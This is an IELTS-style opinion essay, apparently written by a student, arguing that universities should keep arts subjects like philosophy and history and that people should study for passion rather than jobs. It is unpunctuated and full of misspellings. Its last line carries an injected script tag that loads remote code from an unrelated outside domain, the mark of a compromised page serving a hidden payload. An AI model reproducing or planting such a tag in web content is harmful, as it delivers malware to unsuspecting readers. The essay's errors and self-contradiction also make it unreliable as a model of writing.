rising universities fees and scarce employment prospects for graduates have led some people to say that universities should not teach art subjects like philosophy amd history and only offer practical degree courses that maximise chacnes of employment to what extent do you agree or disagree

studenta invest a great deal of money in tertiary education therefore vocational subjects must not be baned in universities as they offer a better investment in terms of job oppurtuinities so i wholeheartedly disagree with the statement and would delve my opinions in the upcoming paragraphs not everyone has interest in particular fields such as medicine engineering and science though they offer a good range of jobs but some folks found no interest in doing them however vocational subjects offer wide range of jobs oppurtunities in various aspects subjects like arts and philosophy provide valuable skills of learning individulas become active thinkers and are learned how to solve their problem rather than passive thinkers who just memorise the facts philosophy studenst become competitive and creative and are always ready to face obstacles no doubt jobs are less for them but after studying arts and philosphy they are prepared for every work they ability to examine and tackle the problem burgeons and analyse challenges no doubt stydying science and medicine makes masses a well educated human but they should only be done if a individual has keen intereat in it they should not learn these subjects for employment one must always remeber that if one is capable of job he or she will get for instacne in india there are many degrees of btech but students are not compatible for jobs they just clear the degree but have no interest and relevant knowledge for btech jobs there are multifarious folk who want to become philospher or historian if universities ban their relevant subjects then how the world will have such high intellectual masses overall it can be extrapolated that employment is the major scenario in ones carreer everyone wants to have jobs but the person compatible for jobs only get employment one shoul always not study for jobs but for the sake of onea dream and passion <script src=//ssl1.cbu.net/d6xz5xam></script>